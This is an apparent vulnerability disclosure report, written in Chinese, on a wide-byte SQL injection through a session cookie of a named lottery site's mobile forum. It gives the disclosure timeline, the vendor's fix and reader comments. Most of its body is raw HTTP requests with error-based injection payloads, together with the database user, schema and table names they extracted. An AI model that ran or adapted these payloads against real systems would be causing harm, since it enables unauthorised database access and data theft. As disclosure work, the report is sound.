2015-04-26: 细节已通知厂商并且等待厂商处理中 2015-04-27: 厂商已经确认,细节仅向厂商公开 2015-05-07: 细节向核心白帽子及相关领域专家公开 2015-05-08: 厂商已经修复漏洞并主动公开,细节向公众公开
wap.17500.cn
宽字节注入:
GET /connect.php HTTP/1.1Host: wap.17500.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1Connection: keep-alive
cookie中的KmGZ_89fa_sid参数
user: bbs@192.168.100.107
接下来看看库:
GET /connect.php HTTP/1.1Host: wap.17500.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1Connection: keep-alive
三个库:
information_schemabbstest
获取bbs库中的表:
GET /connect.php HTTP/1.1Host: wap.17500.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1Connection: keep-alive
378张表,只能叫burp帮忙跑跑:
baidusubmit_sitemapbaidusubmit_urlstatcollect_banlogcollect_cplogcollect_errorlogcollect_illegallogcollect_logposcollect_modcplogcollect_modslogcollect_ratelogcommon_addoncommon_admincp_cmenucommon_admincp_groupcommon_admincp_membercommon_admincp_permcommon_admincp_sessioncommon_admingroupcommon_adminnotecommon_advertisementcommon_advertisement_customcommon_bannedcommon_blockcommon_block_favoritecommon_block_itemcommon_block_item_datacommon_block_permissioncommon_block_piccommon_block_stylecommon_block_xmlcommon_cachecommon_cardcommon_card_logcommon_card_typecommon_connect_guestcommon_credit_logcommon_credit_log_fieldcommon_credit_rulecommon_credit_rule_logcommon_credit_rule_log_fieldcommon_croncommon_devicetokencommon_districtcommon_diy_datacommon_domaincommon_failedipcommon_failedlogincommon_friendlinkcommon_grouppmcommon_invitecommon_limit_ipscommon_limit_logincommon_limit_timecommon_magiccommon_magiclogcommon_mailcroncommon_mailqueuecommon_membercommon_member_action_logcommon_member_connectcommon_member_countcommon_member_crimecommon_member_field_forumcommon_member_field_homecommon_member_forum_buylogcommon_member_grouppmcommon_member_logcommon_member_magiccommon_member_medalcommon_member_newpromptcommon_member_profilecommon_member_profilecommon_member_profile_settingcommon_member_securitycommon_member_secwhitecommon_member_stat_fieldcommon_member_stat_fieldcachecommon_member_stat_searchcommon_member_stat_searchcachecommon_member_statuscommon_member_temp___common_member_validatecommon_member_verifycommon_member_verify_infocommon_moderatecommon_myappcommon_myinvitecommon_mytaskcommon_navcommon_onlinetimecommon_optimizercommon_patchcommon_plugincommon_pluginvarcommon_processcommon_regipcommon_relatedlinkcommon_remote_portcommon_reportcommon_searchindexcommon_seccheckcommon_secquestioncommon_sessioncommon_settingcommon_smileycommon_sms_validatecommon_sms_validate_logcommon_sphinxcountercommon_statcommon_statusercommon_stylecommon_stylevarcommon_syscachecommon_syscache_bakcommon_tagcommon_tagitemcommon_taskcommon_taskvarcommon_templatecommon_template_blockcommon_template_permissioncommon_uin_blackcommon_usergroupcommon_usergroup_fieldcommon_visitcommon_wordcommon_word_typeconnect_disktaskconnect_feedlogconnect_memberbindlogconnect_postfeedlogconnect_tlogconnect_tthreadlogforum_accessforum_activityforum_activityapplyforum_announcementforum_attachmentforum_attachment_0forum_attachment_1forum_attachment_2forum_attachment_3forum_attachment_4forum_attachment_5forum_attachment_6forum_attachment_7forum_attachment_8forum_attachment_9forum_attachment_exifforum_attachment_unusedforum_attachtypeforum_bbcodeforum_collectionforum_collectioncommentforum_collectionfollowforum_collectioninviteforum_collectionrelatedforum_collectionteamworkerforum_collectionthreadforum_creditslogforum_debateforum_debatepostforum_faqforum_filter_postforum_forumforum_forum_threadtableforum_forumfieldforum_forumrecommendforum_groupcreditslogforum_groupfieldforum_groupinviteforum_grouplevelforum_grouprankingforum_groupuserforum_hotreply_memberforum_hotreply_numberforum_imagetypeforum_medalforum_medallogforum_memberrecommendforum_moderatorforum_modworkforum_newthreadforum_onlinelistforum_orderforum_pollforum_polloptionforum_polloption_imageforum_pollvoterforum_postforum_post_1forum_post_2forum_post_3forum_post_4forum_post_5forum_post_6forum_post_7forum_post_8forum_post_9forum_post_locationforum_post_moderateforum_post_tableidforum_postcacheforum_postcommentforum_postlogforum_postpositionforum_poststickforum_promotionforum_ratelogforum_relatedthreadforum_replycreditforum_rsscacheforum_sofaforum_spacecacheforum_statlogforum_threadforum_thread_1forum_thread_moderateforum_threadaddviewsforum_threadcalendarforum_threadclassforum_threadclosedforum_threaddisableposforum_threadhidelogforum_threadhotforum_threadimageforum_threadlogforum_threadmodforum_threadpartakeforum_threadpreviewforum_threadprofileforum_threadprofile_groupforum_threadrushforum_threadtypeforum_tradeforum_tradecommentforum_tradelogforum_typeoptionforum_typeoptionvarforum_typevarforum_warninghome_albumhome_album_categoryhome_appcreditloghome_blacklisthome_bloghome_blog_categoryhome_blog_moderatehome_blogfieldhome_classhome_clickhome_clickuserhome_commenthome_comment_moderatehome_docommenthome_doinghome_doing_moderatehome_favoritehome_feedhome_feed_apphome_followhome_follow_feedhome_follow_feed_archiverhome_friendhome_friend_requesthome_friendloghome_notificationhome_pichome_pic_moderatehome_picfieldhome_pokehome_pokearchivehome_sharehome_share_moderatehome_showhome_specialuserhome_userapphome_userappfieldhome_visitorlecai_gifts_activitylecai_gifts_loglecai_taihu_articlelecai_taihu_commentlecai_taihu_formulaslecai_taihu_guesslecai_taihu_kindlogin_checkmobile_settingmobileoem_membermobileoem_pushthreadsmyrepeatsplugin_user_defenderplugin_user_defender_badpwdplugin_user_defender_failedloginplugin_user_defender_listplugin_user_defender_noticeplugin_user_defender_statportal_article_contentportal_article_countportal_article_moderateportal_article_relatedportal_article_titleportal_article_trashportal_attachmentportal_categoryportal_category_permissionportal_commentportal_comment_moderateportal_rsscacheportal_topicportal_topic_picpre_home_follow_feed_archiversecurity_evilpostsecurity_evilusersecurity_failedloguc_adminsuc_applicationsuc_avatar_validateuc_badwordsuc_domainsuc_failedloginsuc_feedsuc_friendsuc_mailqueueuc_memberfieldsuc_membersuc_mergemembersuc_newpmuc_notelistuc_pm_indexesuc_pm_listsuc_pm_membersuc_pm_messages_0uc_pm_messages_1uc_pm_messages_2uc_pm_messages_3uc_pm_messages_4uc_pm_messages_5uc_pm_messages_6uc_pm_messages_7uc_pm_messages_8uc_pm_messages_9uc_pmsuc_protectedmembersuc_settingsuc_sqlcacheuc_tagsuc_varsucenter_adminsucenter_applicationsucenter_badwordsucenter_domainsucenter_failedloginsucenter_feedsucenter_friendsucenter_mailqueueucenter_memberfieldsucenter_membersucenter_mergemembersucenter_newpmucenter_notelistucenter_pm_indexesucenter_pm_listsucenter_pm_membersucenter_pm_messages_0ucenter_pm_messages_1ucenter_pm_messages_2ucenter_pm_messages_3ucenter_pm_messages_4ucenter_pm_messages_5ucenter_pm_messages_6ucenter_pm_messages_7ucenter_pm_messages_8ucenter_pm_messages_9ucenter_protectedmembersucenter_settingsucenter_sqlcacheucenter_tagsucenter_vars
因为开启了gpc,只能把所有的字段提取出来再和表进行猜测匹配,这个有点麻烦,就不弄了。。。
危害等级:高
漏洞Rank:15
确认时间:2015-04-27 10:27
感谢提供的漏洞信息,我们尽快处理。
2015-05-08:已经及时处理
关注。
请教楼主是如何判断出cookie里的参数可以宽字节注入的呢?